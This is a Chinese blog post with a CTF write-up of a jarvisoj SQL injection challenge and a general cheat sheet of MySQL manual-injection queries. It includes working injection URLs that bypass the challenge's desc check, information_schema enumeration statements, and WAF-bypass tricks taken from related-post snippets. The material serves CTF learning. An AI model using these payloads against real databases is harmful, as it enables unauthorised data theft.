mysql手工注入绕过_从一个ctf简单总结下mysql手工注入

最新推荐文章于 2023-03-22 17:04:45 发布
最新推荐文章于 2023-03-22 17:04:45 发布
阅读量302 收藏
点赞数
文章标签: mysql手工注入绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30303283/article/details/113327834
版权

文章最后更新时间为:2019年04月03日 15:26:47

0x01 先拿flag

有个很不错的ctf平台jarvisoj,上面收录了一些经典的ctf题目。今天做了一个web题,借此记录一下sql手工注入的语句。hint:先找到源码再说吧~~<?php

require("config.php");

$table = $_GET['table']?$_GET['table']:"test";

$table = Filter($table);

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();

$sql = "select 'flag{xxx}' from secret_{$table}";

$ret = sql_query($sql);

echo $ret[0];

?>

分析程序可知程序接收tables参数,我们需要通过mysqli_query($mysqli,"desc `secret_{$table}`"),并且利用$sql = "select 'flag{xxx}' from secret_{$table}";来执行注入。

我们知道desc是用来查表的结构的,其使用方法是desc+表名,后面还可以加个字段名,看下图就很清晰了。

7b39dead0f32dc0665e72ee811e6ab82.png

对于表名,使用反引号和单引号的区别不是文章的重点,可以百度到,但是这里有个点:desc users xxx; // 返回空

desc `users` `xxx`; //返回空

desc 'users' 'xxx'; //报错

这里应该也是题目用引号的原因,我们构造类似于下面的结构就可以绕过mysqli_query($mysqli,"desc `secret_{$table}`")了table=test` `xxx

6dfa90ea4d6ba51b22ef2926a0223eca.png

接下来利用上面的形式来利用"select 'flag{xxx}' from secret_{$table}";查数据库 http://web.jarvisoj.com:32794/index.php?table=test` `union select database() limit 1,1

查表 http://web.jarvisoj.com:32794/index.php?table=test` `union select group_concat(distinct table_name) from information_schema.columns where table_schema=database() limit 1,1

229ce37f424b56395ef87209507c5fb7.png

查字段 http://web.jarvisoj.com:32794/index.php?table=test` `union select group_concat(distinct column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1,1

df7173666c552c3c39d7fd1925a68343.png

查数据http://web.jarvisoj.com:32794/index.php?table=test`% `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1

1cff60cee7290434eefad07e699bfef3.png

到这里似乎一切顺利,但回顾一下刚才的注入流程,第一条查询数据库的语句可还原为:

select 'flag{xxx}' from secret_test` `union select database() limit 1,1

这里令人不解,中间的反引号为什么没有影响到语句的执行

为了解决疑问,自己在本地搭建了环境,并且试着将反引号改为单引号或者双引号:

3f73d7ce6be7505a29f3c070818004f8.png

搜索了一下mysql对反引号的处理,似乎没有结果,这里暂且留下一个疑问,也欢迎大家留言指正。

0x02 一般的MYSQL手工注入语句

没什么特别的姿势,这里仅记录一下一般的注入语句,每次都手打太累了。

一般手工注入的姿势为:判断时什么注入,有无过滤关键词 --> 获取数据库用户、版本、当前数据库 --> 获取数据库的某个表 --> 获取字段 --> 获取数据

几个常用函数:version()——MySQL版本

user()——用户名

database()——数据库名

@@datadir——数据库路径

@@version_compile_os——操作系统版本

这里一般要用到连接函数concat(str1,str2,...)直接连接字符串,没有分隔符

concat_ws(separator, str1, str2,...)连接字符串,中间用separator分割

group_concat()用来连接某个字段,用逗号分割mysql> select concat('hello','world');

+-------------------------+

| concat('hello','world') |

+-------------------------+

| helloworld |

+-------------------------+

1 row in set (0.00 sec)

mysql> select concat_ws(',','hello','world');

+--------------------------------+

| concat_ws(',','hello','world') |

+--------------------------------+

| hello,world |

+--------------------------------+

1 row in set (0.00 sec)

mysql> select group_concat(username) from users;

+-----------------------------------------------------------------+

| group_concat(username) |

+-----------------------------------------------------------------+

| Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin |

+-----------------------------------------------------------------+

利用连接函数可以一次查出基本信息:

concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)

concat_ws(0x3a,version(),user(),database(),@@datadir,@@version_compile_os)

group_concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)

500aec26393caa9b544a705e3e69d21c.png

具体的查询语句有很多,主要是依靠information_schema这个库,平时用一种方法也就够了,这里只利用了information_schema.columns这个表。查数据库:(distinct去除了重复数值)

select group_concat(distinct table_schema) from information_schema.columns;

424bd2025dc656ba8035c6ba516c74ae.png查数据库表(库名用16进制,也可以直接用database(),直接加单双引号可能发送错误)

select group_concat(distinct table_name) from information_schema.columns where table_schema = 库名十六进制

564c2000e075e8975feb6da5ae44345b.png查表的字段

select group_concat(distinct column_name) from information_schema.columns where table_name = 表名十六进制

ca09b4e04a82b1031f0bdf2e006166ca.png查数据(0x3a是分号的ascii码)

select group_concat(列1,0x3a,列2,...) from 表名(不能是十六进制)

a7c2e0f24e2e591df99440fa65a716ee.png

小思考

写到这里突然想起前几面找实习面试的时候,面试官问了一个问题,sql语句中什么字段可以编码?

sql语句能用16进制地方的最好用16进制,因为单引号双引号可能造成一些错误,但是什么地方可以16进制编码这个问题还真没思考过。我们可以做些实验。

首先列举出不能编码的字段:

3b65e8f5d03e3b0ff99ff51e9312504a.png

639c0f5e38c67c2cff3fa24edc8db279.png

然后列举可以编码的字段:

69f40c015b9afddce8fc3cff453103da.png

可以看出mysql会对用来比较的字段进行转换,也会对函数参数进行转化。当我们对不同类型的值进行比较的时候,为了使得这些数值可比较,MySQL会做一些隐式转化(Implicit type conversion),具体可参考https://blog.devopszen.com/mysql_params 、 https://dev.mysql.com/doc/refman/5.7/en/type-conversion.html

0x03 reference

鸽骑第E吹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入绕过
tcsecXD的博客
03-24 425
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
mysql 注入补丁_mysql注入绕过的一些技巧
weixin_36389335的博客
12-24 174
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因1.注释绕过select/*comment*/user/*zzsdsdsf*/from mysql.user;2.内联注释绕过/*!12345select*//*!12345user*/ from mysql.user;3.特殊空白字符绕过在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,...
Mysql注入绕过姿势
aiquan9342的博客
11-25 276
1.内联绕过 2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过 or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 十六进制编码 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)...
mysql手工注入绕过_sql注入绕过WAF
weixin_39794734的博客
02-02 716
这几天的CTF题中有好几道题都是sql注入的,但都存在WAF需要绕过,于是整理了一些常见的绕过WAF注入方法。在现实sql注入中我们也常常碰到WAF,那么掌握常见的绕过很有必要。0x01、手工注入绕过1、大小写混合例如:uNIoN sELecT 1,2,3,4只适用于针对大小写关键字的匹配2、替换关键字例如:UNIunionON SELselectECT 1,2,3,43、使用编码URL编码如:...
记一次MySQL注入绕过
末初的CSDN博客
10-01 2162
来源于今天一位朋友叫我帮忙看的题目 查看源码发现提示 存在过滤且,limit参数只能为单个数字 fuzz一下sql注入关键字看看都过滤了哪些字符 直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示; 那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。 if无法使用可以用c.
mysql&&sql注入+ctf+web安全
最新发布
10-08
mysql&&sql注入+ctf+web安全
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
一个简单CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用...
MysqlToMongoDb:一个用于将数据从mysql迁移到mongodb的简单工具,用于Laravel
05-11
MySQL到MongoDb 我开始学习mongodb时就做了这个工具,但找不到任何合适的替代方法。 该工具按预期工作,甚至在使用mysql的实时工作应用程序上进行了测试,但是我强烈建议您在使用此软件包时要格外注意。安装composer...
mysql注入绕过技术
06-04
mysql注入绕过技术
MySQL注入绕开过滤的技巧总结
12-16
首先来看GIF操作: 情况一:空格被过滤 使用括号()代替空格,任何可以计算出结果的语句,都可以用括号包围起来; select * from(users)where id=1; 使用注释/**/绕过空格; select * from/**/users/**/where id=1; 情况二:限制from与某种字符组合 在from后加个点.即使用from.来代替from; select * from. users where id=1; 再直接看GIF: 说白了,就是将‘字段名 ‘替换成hex; 这里会联想到开始学SQL注入的时候,利用load_file或者into outfile
MySQL注入绕过备忘录
weixin_43610673的博客
04-25 5157
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
MYSQL-手工SQL注入绕过技巧-实战篇
eT48_Sec
12-24 5939
之前遇到一个站点,经检测存在SQL注入,但是有WAF存在,后来知道是绿盟的WEB应用防火墙。 后来在社区看到了一篇关于《sql注入绕过技巧》的文章后(原文:http://zone.wooyun.org/content/16772),回过头来重新进行手工,这次总算干掉了WAF。以下是自己对于本次渗透的一些学习笔记,包含一些绕过waf的技巧。 首先判断注入点 id=161-(select
CTF__(1)Web之SQL手工注入
weixin_30911451的博客
11-24 147
等待更新 转载于:https://www.cnblogs.com/HeroCat/p/10013445.html
mysql 注入 绕过,渗透测试:记一次绕过简单SQL防注入爆菊(mysql)
weixin_42362885的博客
03-17 230
转自:http://www.cnseay.com/2418/目标站用www.cnseay.com代替。打开网站,点开一个产品页面。在?id=62后面加单引号,如下图判断出参数id无单引号保护,且GPC开启,无单引号就好办多了。不过经测试,发现以下问题:1、常用注入关键字union、select、from、星号(*)、等号等均被替换为空。2、参数被多条SQL语句使用,只能用第一条语句双查询报错注入...
渗透测试——sql注入绕过
zjdda的博客
05-22 331
1.绕过原理 部分页面对用户所提交的特殊字符进行了过滤,导致用户输入一些恶意语句没办法实现预期效果,我们可以通过对一些特殊字符的转换,或者是通过其他方式,将恶意代码带入数据库。 2.绕过注入实战 对http://127.0.0.1/sqli/Less-27/页面进行sql注入,查询到用户信息 环境:sqli靶场 通过测试发现,此页面对/,–,+,+,select,union,UNION,SELECT,Union,Select进行了过滤。 此时空格可以用%09代替,union,select使用无规律大小写组合
SQL注入MySQL注入姿势及绕过
CP1024的博客
01-23 3015
SQL注入MySQL注入姿势及绕过 参考链接: https://xz.aliyun.com/t/10594 感受 1. 写的详细,并且绕过姿势也很多,大佬级人物 2. 在网上发现类似的文章,感觉这就是为啥知识需要付费的原因。 3. 学到的东西很多 ...
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1663
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
mysql与SQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQL与SQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值